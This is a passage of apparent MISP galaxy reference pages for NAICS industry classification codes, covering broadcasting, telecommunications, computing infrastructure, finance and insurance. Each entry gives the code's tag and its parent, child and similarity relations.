  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="516110" with estimative-language:likelihood-probability="likely"

516110

Radio Broadcasting Stations

The tag is: misp-galaxy:naics="516110"

516110 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51611" with estimative-language:likelihood-probability="likely"

51612

Television Broadcasting Stations

The tag is: misp-galaxy:naics="51612"

51612 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="516120" with estimative-language:likelihood-probability="likely"

516120

Television Broadcasting Stations

The tag is: misp-galaxy:naics="516120"

516120 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51612" with estimative-language:likelihood-probability="likely"

5162

Media Streaming Distribution Services, Social Networks, and Other Media Networks and Content Providers

The tag is: misp-galaxy:naics="5162"

5162 has relationships with:

  • child-of: misp-galaxy:naics="516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516210" with estimative-language:likelihood-probability="likely"

51621

Media Streaming Distribution Services, Social Networks, and Other Media Networks and Content Providers

The tag is: misp-galaxy:naics="51621"

51621 has relationships with:

  • child-of: misp-galaxy:naics="5162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="516210" with estimative-language:likelihood-probability="likely"

516210

Media Streaming Distribution Services, Social Networks, and Other Media Networks and Content Providers

The tag is: misp-galaxy:naics="516210"

516210 has relationships with:

  • child-of: misp-galaxy:naics="5162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51621" with estimative-language:likelihood-probability="likely"

517

Telecommunications

The tag is: misp-galaxy:naics="517"

517 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5174" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5178" with estimative-language:likelihood-probability="likely"

5171

Wired and Wireless Telecommunications (except Satellite)

The tag is: misp-galaxy:naics="5171"

5171 has relationships with:

  • child-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517122" with estimative-language:likelihood-probability="likely"

51711

Wired and Wireless Telecommunications Carriers (except Satellite)

The tag is: misp-galaxy:naics="51711"

51711 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517111

Wired Telecommunications Carriers

The tag is: misp-galaxy:naics="517111"

517111 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517112

Wireless Telecommunications Carriers (except Satellite)

The tag is: misp-galaxy:naics="517112"

517112 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

51712

Telecommunications Resellers and Agents for Wireless Telecommunication Services

The tag is: misp-galaxy:naics="51712"

51712 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517121

Telecommunications Resellers

The tag is: misp-galaxy:naics="517121"

517121 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517122

Agents for Wireless Telecommunications Services

The tag is: misp-galaxy:naics="517122"

517122 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

5174

Satellite Telecommunications

The tag is: misp-galaxy:naics="5174"

5174 has relationships with:

  • child-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51741" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517410" with estimative-language:likelihood-probability="likely"

51741

Satellite Telecommunications

The tag is: misp-galaxy:naics="51741"

51741 has relationships with:

  • child-of: misp-galaxy:naics="5174" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="517410" with estimative-language:likelihood-probability="likely"

517410

Satellite Telecommunications

The tag is: misp-galaxy:naics="517410"

517410 has relationships with:

  • child-of: misp-galaxy:naics="5174" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51741" with estimative-language:likelihood-probability="likely"

5178

All Other Telecommunications

The tag is: misp-galaxy:naics="5178"

5178 has relationships with:

  • child-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51781" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517810" with estimative-language:likelihood-probability="likely"

51781

All Other Telecommunications

The tag is: misp-galaxy:naics="51781"

51781 has relationships with:

  • child-of: misp-galaxy:naics="5178" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="517810" with estimative-language:likelihood-probability="likely"

517810

All Other Telecommunications

The tag is: misp-galaxy:naics="517810"

517810 has relationships with:

  • child-of: misp-galaxy:naics="5178" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51781" with estimative-language:likelihood-probability="likely"

518

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="518"

518 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5182" with estimative-language:likelihood-probability="likely"

5182

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="5182"

5182 has relationships with:

  • child-of: misp-galaxy:naics="518" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="518210" with estimative-language:likelihood-probability="likely"

51821

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="51821"

51821 has relationships with:

  • child-of: misp-galaxy:naics="5182" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="518210" with estimative-language:likelihood-probability="likely"

518210

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="518210"

518210 has relationships with:

  • child-of: misp-galaxy:naics="5182" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51821" with estimative-language:likelihood-probability="likely"

519

Web Search Portals, Libraries, Archives, and Other Information Services

The tag is: misp-galaxy:naics="519"

519 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

5192

Web Search Portals, Libraries, Archives, and Other Information Services

The tag is: misp-galaxy:naics="5192"

5192 has relationships with:

  • child-of: misp-galaxy:naics="519" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="519210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51929" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="519290" with estimative-language:likelihood-probability="likely"

51921

Libraries and Archives

The tag is: misp-galaxy:naics="51921"

51921 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="519210" with estimative-language:likelihood-probability="likely"

519210

Libraries and Archives

The tag is: misp-galaxy:naics="519210"

519210 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51921" with estimative-language:likelihood-probability="likely"

51929

Web Search Portals and All Other Information Services

The tag is: misp-galaxy:naics="51929"

51929 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="519290" with estimative-language:likelihood-probability="likely"

519290

Web Search Portals and All Other Information Services

The tag is: misp-galaxy:naics="519290"

519290 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51929" with estimative-language:likelihood-probability="likely"

52

Finance and Insurance

The tag is: misp-galaxy:naics="52"

52 has relationships with:

  • parent-of: misp-galaxy:naics="521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525" with estimative-language:likelihood-probability="likely"

521

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="521"

521 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5211" with estimative-language:likelihood-probability="likely"

5211

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="5211"

5211 has relationships with:

  • child-of: misp-galaxy:naics="521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="521110" with estimative-language:likelihood-probability="likely"

52111

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="52111"

52111 has relationships with:

  • child-of: misp-galaxy:naics="5211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="521110" with estimative-language:likelihood-probability="likely"

521110

Monetary Authorities-Central Bank

The tag is: misp-galaxy:naics="521110"

521110 has relationships with:

  • child-of: misp-galaxy:naics="5211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52111" with estimative-language:likelihood-probability="likely"

522

Credit Intermediation and Related Activities

The tag is: misp-galaxy:naics="522"

522 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

5221

Depository Credit Intermediation

The tag is: misp-galaxy:naics="5221"

5221 has relationships with:

  • child-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52218" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522180" with estimative-language:likelihood-probability="likely"

52211

Commercial Banking

The tag is: misp-galaxy:naics="52211"

52211 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522110" with estimative-language:likelihood-probability="likely"

522110

Commercial Banking

The tag is: misp-galaxy:naics="522110"

522110 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52211" with estimative-language:likelihood-probability="likely"

52213

Credit Unions

The tag is: misp-galaxy:naics="52213"

52213 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522130" with estimative-language:likelihood-probability="likely"

522130

Credit Unions

The tag is: misp-galaxy:naics="522130"

522130 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52213" with estimative-language:likelihood-probability="likely"

52218

Savings Institutions and Other Depository Credit Intermediation

The tag is: misp-galaxy:naics="52218"

52218 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522180" with estimative-language:likelihood-probability="likely"

522180

Savings Institutions and Other Depository Credit Intermediation

The tag is: misp-galaxy:naics="522180"

522180 has relationships with:

  • child-of: misp-galaxy:naics="5221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52218" with estimative-language:likelihood-probability="likely"

5222

Nondepository Credit Intermediation

The tag is: misp-galaxy:naics="5222"

5222 has relationships with:

  • child-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522299" with estimative-language:likelihood-probability="likely"

52221

Credit Card Issuing

The tag is: misp-galaxy:naics="52221"

52221 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522210" with estimative-language:likelihood-probability="likely"

522210

Credit Card Issuing

The tag is: misp-galaxy:naics="522210"

522210 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52221" with estimative-language:likelihood-probability="likely"

52222

Sales Financing

The tag is: misp-galaxy:naics="52222"

52222 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522220" with estimative-language:likelihood-probability="likely"

522220

Sales Financing

The tag is: misp-galaxy:naics="522220"

522220 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52222" with estimative-language:likelihood-probability="likely"

52229

Other Nondepository Credit Intermediation

The tag is: misp-galaxy:naics="52229"

52229 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

522291

Consumer Lending

The tag is: misp-galaxy:naics="522291"

522291 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

522292

Real Estate Credit

The tag is: misp-galaxy:naics="522292"

522292 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

522299

International, Secondary Market, and All Other Nondepository Credit Intermediation

The tag is: misp-galaxy:naics="522299"

522299 has relationships with:

  • child-of: misp-galaxy:naics="5222" with estimative-language:likelihood-probability="likely"

5223

Activities Related to Credit Intermediation

The tag is: misp-galaxy:naics="5223"

5223 has relationships with:

  • child-of: misp-galaxy:naics="522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52239" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="522390" with estimative-language:likelihood-probability="likely"

52231

Mortgage and Nonmortgage Loan Brokers

The tag is: misp-galaxy:naics="52231"

52231 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522310" with estimative-language:likelihood-probability="likely"

522310

Mortgage and Nonmortgage Loan Brokers

The tag is: misp-galaxy:naics="522310"

522310 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52231" with estimative-language:likelihood-probability="likely"

52232

Financial Transactions Processing, Reserve, and Clearinghouse Activities

The tag is: misp-galaxy:naics="52232"

52232 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522320" with estimative-language:likelihood-probability="likely"

522320

Financial Transactions Processing, Reserve, and Clearinghouse Activities

The tag is: misp-galaxy:naics="522320"

522320 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52232" with estimative-language:likelihood-probability="likely"

52239

Other Activities Related to Credit Intermediation

The tag is: misp-galaxy:naics="52239"

52239 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="522390" with estimative-language:likelihood-probability="likely"

522390

Other Activities Related to Credit Intermediation

The tag is: misp-galaxy:naics="522390"

522390 has relationships with:

  • child-of: misp-galaxy:naics="5223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52239" with estimative-language:likelihood-probability="likely"

523

Securities, Commodity Contracts, and Other Financial Investments and Related Activities

The tag is: misp-galaxy:naics="523"

523 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

5231

Securities and Commodity Contracts Intermediation and Brokerage

The tag is: misp-galaxy:naics="5231"

5231 has relationships with:

  • child-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52316" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523160" with estimative-language:likelihood-probability="likely"

52315

Investment Banking and Securities Intermediation

The tag is: misp-galaxy:naics="52315"

52315 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523150" with estimative-language:likelihood-probability="likely"

523150

Investment Banking and Securities Intermediation

The tag is: misp-galaxy:naics="523150"

523150 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52315" with estimative-language:likelihood-probability="likely"

52316

Commodity Contracts Intermediation

The tag is: misp-galaxy:naics="52316"

52316 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523160" with estimative-language:likelihood-probability="likely"

523160

Commodity Contracts Intermediation

The tag is: misp-galaxy:naics="523160"

523160 has relationships with:

  • child-of: misp-galaxy:naics="5231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52316" with estimative-language:likelihood-probability="likely"

5232

Securities and Commodity Exchanges

The tag is: misp-galaxy:naics="5232"

5232 has relationships with:

  • child-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523210" with estimative-language:likelihood-probability="likely"

52321

Securities and Commodity Exchanges

The tag is: misp-galaxy:naics="52321"

52321 has relationships with:

  • child-of: misp-galaxy:naics="5232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523210" with estimative-language:likelihood-probability="likely"

523210

Securities and Commodity Exchanges

The tag is: misp-galaxy:naics="523210"

523210 has relationships with:

  • child-of: misp-galaxy:naics="5232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52321" with estimative-language:likelihood-probability="likely"

5239

Other Financial Investment Activities

The tag is: misp-galaxy:naics="5239"

5239 has relationships with:

  • child-of: misp-galaxy:naics="523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="523999" with estimative-language:likelihood-probability="likely"

52391

Miscellaneous Intermediation

The tag is: misp-galaxy:naics="52391"

52391 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523910" with estimative-language:likelihood-probability="likely"

523910

Miscellaneous Intermediation

The tag is: misp-galaxy:naics="523910"

523910 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52391" with estimative-language:likelihood-probability="likely"

52394

Portfolio Management and Investment Advice

The tag is: misp-galaxy:naics="52394"

52394 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="523940" with estimative-language:likelihood-probability="likely"

523940

Portfolio Management and Investment Advice

The tag is: misp-galaxy:naics="523940"

523940 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52394" with estimative-language:likelihood-probability="likely"

52399

All Other Financial Investment Activities

The tag is: misp-galaxy:naics="52399"

52399 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

523991

Trust, Fiduciary, and Custody Activities

The tag is: misp-galaxy:naics="523991"

523991 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

523999

Miscellaneous Financial Investment Activities

The tag is: misp-galaxy:naics="523999"

523999 has relationships with:

  • child-of: misp-galaxy:naics="5239" with estimative-language:likelihood-probability="likely"

524

Insurance Carriers and Related Activities

The tag is: misp-galaxy:naics="524"

524 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

5241

Insurance Carriers

The tag is: misp-galaxy:naics="5241"

5241 has relationships with:

  • child-of: misp-galaxy:naics="524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524126" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524127" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524128" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524130" with estimative-language:likelihood-probability="likely"

52411

Direct Life, Health, and Medical Insurance Carriers

The tag is: misp-galaxy:naics="52411"

52411 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524113

Direct Life Insurance Carriers

The tag is: misp-galaxy:naics="524113"

524113 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524114

Direct Health and Medical Insurance Carriers

The tag is: misp-galaxy:naics="524114"

524114 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

52412

Direct Insurance (except Life, Health, and Medical) Carriers

The tag is: misp-galaxy:naics="52412"

52412 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524126

Direct Property and Casualty Insurance Carriers

The tag is: misp-galaxy:naics="524126"

524126 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524127

Direct Title Insurance Carriers

The tag is: misp-galaxy:naics="524127"

524127 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

524128

Other Direct Insurance (except Life, Health, and Medical) Carriers

The tag is: misp-galaxy:naics="524128"

524128 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

52413

Reinsurance Carriers

The tag is: misp-galaxy:naics="52413"

52413 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="524130" with estimative-language:likelihood-probability="likely"

524130

Reinsurance Carriers

The tag is: misp-galaxy:naics="524130"

524130 has relationships with:

  • child-of: misp-galaxy:naics="5241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52413" with estimative-language:likelihood-probability="likely"

5242

Agencies, Brokerages, and Other Insurance Related Activities

The tag is: misp-galaxy:naics="5242"

5242 has relationships with:

  • child-of: misp-galaxy:naics="524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52429" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="524298" with estimative-language:likelihood-probability="likely"

52421

Insurance Agencies and Brokerages

The tag is: misp-galaxy:naics="52421"

52421 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="524210" with estimative-language:likelihood-probability="likely"

524210

Insurance Agencies and Brokerages

The tag is: misp-galaxy:naics="524210"

524210 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52421" with estimative-language:likelihood-probability="likely"

52429

Other Insurance Related Activities

The tag is: misp-galaxy:naics="52429"

52429 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

524291

Claims Adjusting

The tag is: misp-galaxy:naics="524291"

524291 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

524292

Pharmacy Benefit Management and Other Third Party Administration of Insurance and Pension Funds

The tag is: misp-galaxy:naics="524292"

524292 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

524298

All Other Insurance Related Activities

The tag is: misp-galaxy:naics="524298"

524298 has relationships with:

  • child-of: misp-galaxy:naics="5242" with estimative-language:likelihood-probability="likely"

525

Funds, Trusts, and Other Financial Vehicles

The tag is: misp-galaxy:naics="525"

525 has relationships with:

  • child-of: misp-galaxy:naics="52" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

5251

Insurance and Employee Benefit Funds

The tag is: misp-galaxy:naics="5251"

5251 has relationships with:

  • child-of: misp-galaxy:naics="525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52519" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525190" with estimative-language:likelihood-probability="likely"

52511

Pension Funds

The tag is: misp-galaxy:naics="52511"

52511 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525110" with estimative-language:likelihood-probability="likely"

525110

Pension Funds

The tag is: misp-galaxy:naics="525110"

525110 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52511" with estimative-language:likelihood-probability="likely"

52512

Health and Welfare Funds

The tag is: misp-galaxy:naics="52512"

52512 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525120" with estimative-language:likelihood-probability="likely"

525120

Health and Welfare Funds

The tag is: misp-galaxy:naics="525120"

525120 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52512" with estimative-language:likelihood-probability="likely"

52519

Other Insurance Funds

The tag is: misp-galaxy:naics="52519"

52519 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525190" with estimative-language:likelihood-probability="likely"

525190

Other Insurance Funds

The tag is: misp-galaxy:naics="525190"

525190 has relationships with:

  • child-of: misp-galaxy:naics="5251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52519" with estimative-language:likelihood-probability="likely"

5259

Other Investment Pools and Funds

The tag is: misp-galaxy:naics="5259"

5259 has relationships with:

  • child-of: misp-galaxy:naics="525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525910" with estimative-language:likelihood-probability="likely"

